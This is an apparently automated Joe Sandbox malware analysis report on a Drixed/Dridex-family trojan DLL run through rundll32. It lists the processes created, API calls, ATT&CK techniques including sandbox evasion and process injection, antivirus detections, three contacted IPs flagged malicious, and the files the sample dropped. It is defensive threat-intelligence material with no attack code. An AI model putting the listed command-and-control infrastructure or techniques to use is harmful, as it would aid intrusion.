Source: WERDF95.tmp.WERInternalMetadata.xml.21.dr	Binary or memory string: <SystemProductName>VMware7,1</SystemProductName>
Source: WERE0CF.tmp.xml.21.dr	Binary or memory string: <arg nm="sysmfg" val="VMware, Inc." />

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E8B6D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

4_2_6E8B6D50

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7144 -s 652

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E8C3110 RtlAddVectoredExceptionHandler,

4_2_6E8C3110

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7144 -s 652	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6296 -s 652	Jump to behavior

Source: loaddll32.exe, 00000001.00000002.732756195.00000000011A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.420285938.0000000003520000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.687603981.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.757450406.0000000003AE0000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000000.644072001.0000000003310000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.676062687.0000000003850000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000000.679799692.0000000002D90000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000000.680159187.00000000033A0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000002.732756195.00000000011A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.420285938.0000000003520000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.687603981.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.757450406.0000000003AE0000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000000.644072001.0000000003310000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.676062687.0000000003850000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000000.679799692.0000000002D90000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000000.680159187.00000000033A0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.732756195.00000000011A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.420285938.0000000003520000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.687603981.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.757450406.0000000003AE0000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000000.644072001.0000000003310000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.676062687.0000000003850000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000000.679799692.0000000002D90000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000000.680159187.00000000033A0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.732756195.00000000011A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.420285938.0000000003520000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.687603981.0000000002FA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.757450406.0000000003AE0000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000000.644072001.0000000003310000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.676062687.0000000003850000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000000.679799692.0000000002D90000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000000.680159187.00000000033A0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

4_2_6E8B6D50

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

4_2_6E8B6D50

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Disable or Modify Tools1	OS Credential Dumping	Security Software Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion11	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	21%	Virustotal		Browse
SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	29%	ReversingLabs	Win32.Trojan.Drixed
SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
12.0.rundll32.exe.3220000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
12.2.rundll32.exe.4d34756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
9.2.rundll32.exe.33a0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
13.0.rundll32.exe.3b0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
3.0.rundll32.exe.2f80000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
4.2.rundll32.exe.29a0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
13.2.rundll32.exe.6e8b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.0.rundll32.exe.4a04756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
4.2.rundll32.exe.4484756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
11.0.rundll32.exe.2990000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
11.0.rundll32.exe.47f4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
14.0.rundll32.exe.4884756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
9.2.rundll32.exe.6e8b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
11.0.rundll32.exe.2990000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
3.0.rundll32.exe.6e8b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
13.2.rundll32.exe.3b0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
1.2.loaddll32.exe.ce4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
12.0.rundll32.exe.6e8b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
12.2.rundll32.exe.3220000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
13.2.rundll32.exe.29f4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
12.0.rundll32.exe.4d34756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.0.rundll32.exe.2f80000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
11.2.rundll32.exe.2990000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
11.2.rundll32.exe.6e8b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
1.2.loaddll32.exe.7b0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
4.2.rundll32.exe.6e8b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
14.0.rundll32.exe.2d60000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
12.2.rundll32.exe.6e8b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
11.0.rundll32.exe.6e8b0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
11.2.rundll32.exe.47f4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
13.0.rundll32.exe.6e8b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
13.0.rundll32.exe.29f4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
9.2.rundll32.exe.36a4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
14.0.rundll32.exe.6e8b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.0.rundll32.exe.4a04756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
11.0.rundll32.exe.47f4756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
11.0.rundll32.exe.6e8b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.vomfass.deDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.vomfass.deDVarFileInfo$	rundll32.exe, 00000003.00000000.423532537.000000006E8CF000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.784764544.000000006E8CF000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000000.698207139.000000006E8CF000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000002.723020912.000000006E8CF000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.753729339.000000006E8CF000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000000.713332446.000000006E8CF000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
66.147.235.11	unknown	United States	23535	HOSTROCKETUS	true
149.202.179.100	unknown	France	16276	OVHFR	true
81.0.236.89	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	510679
Start date:	28.10.2021
Start time:	04:52:34
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.evad.winDLL@23/6@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 92.5% (good quality ratio 82.9%) Quality average: 74.4% Quality standard deviation: 33.3%
HCA Information:	Successful, ratio: 73% Number of executed functions: 32 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 8.248.133.254, 8.253.204.120, 67.27.158.126, 67.27.235.126, 67.27.233.254, 20.82.210.154, 20.190.160.4, 20.190.160.134, 20.190.160.8, 20.190.160.136, 20.190.160.132, 20.190.160.69, 20.190.160.73, 20.190.160.71, 20.42.65.92, 104.208.16.94, 20.42.73.29 Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, wu-shim.trafficmanager.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, www.tm.a.prd.aadg.akadns.net, arc.msn.com, login.msa.msidentity.com, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
66.147.235.11	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse
149.202.179.100	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTROCKETUS	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	66.147.235.11
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse	66.147.235.11
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	66.147.235.11
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	66.147.235.11
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse	66.147.235.11
	s1uOMLvpO4.exe	Get hash	malicious	Browse	216.120.236.127
	WGs54P9e8a	Get hash	malicious	Browse	216.120.241.108
	ba2Eq178BGXyW5T.exe	Get hash	malicious	Browse	216.120.237.68
	4TXvMuUjTxE2kqz.exe	Get hash	malicious	Browse	66.147.239.119
	Requirements-oct_2020.exe	Get hash	malicious	Browse	66.147.239.119
	JESEE FRIED FIRDAY.exe	Get hash	malicious	Browse	66.147.239.119
	Scan_0884218630071 Bank Swift.exe	Get hash	malicious	Browse	66.147.239.119
	BANK ACCOUNT DETAILS ATTACHED.pdf.exe	Get hash	malicious	Browse	66.147.239.119
	XYmX3bLQJ9.xls	Get hash	malicious	Browse	66.147.238.141
	payment730.xls	Get hash	malicious	Browse	66.147.238.141
OVHFR	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	149.202.179.100
	protocol-1096018033.xls	Get hash	malicious	Browse	192.99.46.215
	protocol-1096018033.xls	Get hash	malicious	Browse	192.99.46.215
	arm7	Get hash	malicious	Browse	8.33.207.78
	#U0191ACTU#U0156A_wfpqacDkwlb__Z2676679.vbs	Get hash	malicious	Browse	144.217.33.249
	Byov62cXa1.exe	Get hash	malicious	Browse	94.23.24.82
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse	149.202.179.100
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	149.202.179.100
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	149.202.179.100
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse	149.202.179.100
	lyVSOhLA7o.dll	Get hash	malicious	Browse	51.210.102.137
	protocol-1441399238.xls	Get hash	malicious	Browse	192.99.46.215
	protocol-1441399238.xls	Get hash	malicious	Browse	192.99.46.215
	protocol-1086855687.xls	Get hash	malicious	Browse	192.99.46.215
	protocol-1086855687.xls	Get hash	malicious	Browse	192.99.46.215

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCF97.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 12:00:21 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	42702
Entropy (8bit):	2.207124165645606
Encrypted:	false
SSDEEP:	192:VZdlaApHpPO5SkbnNXEApvXmSOqM43Y45/iwl7PDS:DKp5LbNXEqO2MOY45/3DD
MD5:	DB0652CF648D9BCF1F5AB9194E1F68C1
SHA1:	3DC406319171C59F344FB33F695D8CFD04B4EBA1
SHA-256:	16C41435B544898BC70360A83C2FA50B6B1A3C9DA505EE93C5114909151D7A84
SHA-512:	C16019E1BAC092F1BB9E99792EBA7E5F137AA82EDE959AE22963F910C80A39A266488B578C26E5AC967520BE1959207CD272D415014584153EE9D7DD80F5A32C
Malicious:	false
Preview:	MDMP....... ........za........................................(-..........T.......8...........T...........................0................................................................................U...........B..............GenuineIntelW...........T...........t.za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD321.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 12:00:22 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	45982
Entropy (8bit):	2.099881264021738
Encrypted:	false
SSDEEP:	192:mjbaApNpB9WZO5SkbRF09Tm+e9J2aKY8D+zfCZKnpN5NTqugn:Bwp5LboQJ2aKYlfpnpN/g
MD5:	D2C917AA03B5BE458524EDE31C8BF2E3
SHA1:	8107F1286AD10187FD5109F17D75AEC43ED1C45F
SHA-256:	CD92C35C4C9B8ECF3827BDAD5A7C1B7339FE87A1CD79E7B1A5542CFA02DA8D03
SHA-512:	8C88E3B26DABF9D1592308A198413BC080232550A7BF5D500019F12081AF57D0D94C1BDAACFC07DC3EF26FE417808FE7D5B0392C4F7A5E519593BB5656320076
Malicious:	false
Preview:	MDMP....... ........za........................................(-..........T.......8...........T...........................0................................................................................U...........B..............GenuineIntelW...........T...........u.za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA56.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8346
Entropy (8bit):	3.697784594736263
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNijE6Bz6Yxp6jmgmfTHSwCprI89bL9sft65m:RrlsNig6Bz6Yf6igmfTHSdL2ff
MD5:	A865B108032789E908917669D003D0F9
SHA1:	757F83168C63440CBC9EF8E26FECABDBEAB57BFB
SHA-256:	52AAA5643776D7D5ED46F89B273A887DB942CE9780B5C465E65049F2C0099C4B
SHA-512:	1E5AFF0F2E51373814E9EE405F579A6826781F8DB71698D2FA133B51532533C7039BC8804707792F90ECC53C1FC0CBDC8E7102ED86423AE4E15D23C9B3B54837
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.4.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE10.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4694
Entropy (8bit):	4.491266080632903
Encrypted:	false
SSDEEP:	48:cvIwSD8zsNJgtWI94eWSC8Bt8fm8M4JCdsRFL+q8/Jbw4SrSSd:uITfnLfSNYJ18wDWSd
MD5:	3F94544E2C46B95C25E14F305717973C
SHA1:	CE511706AE2CA5A6FB0C38819387B2AEA3DD3549
SHA-256:	E286808229401A1183E3B16E4812CD7CC05815D03E502123FAAD69EC9AB1A19F
SHA-512:	C6395FD197D9B5C27BEED75D2C7A54531902BC5A81041848DD32A43C7580290DA58E912C0682F7894FAF5508D6EB6C4A2F1173F99CEC4604D9D2CFF561599A82
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229591" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF95.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8346
Entropy (8bit):	3.6960872073756694
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiGQ656YxJ6jmgmfTiSgCprk89bCXsfj2m:RrlsNi5656Y/6igmfTiSJCcfb
MD5:	C598E8847032D22DE4336DC03715CA84
SHA1:	7FE6F4EF927331D8CF98FB2E03A4D4CA131D67DF
SHA-256:	A82ACA21C9EDEB3EF31B77AF5959D8C83D3C2814640F0EA9401F6BC71F2CE664
SHA-512:	12A7EC6FD4522157DB999F7C2247FBDB75E7075D613B3C66D2A7510574D6E93AF0047607DEC2C45E0FA4E620A6F55B43BE8392891860F0D85FD47933633D5DD0
Malicious:	false
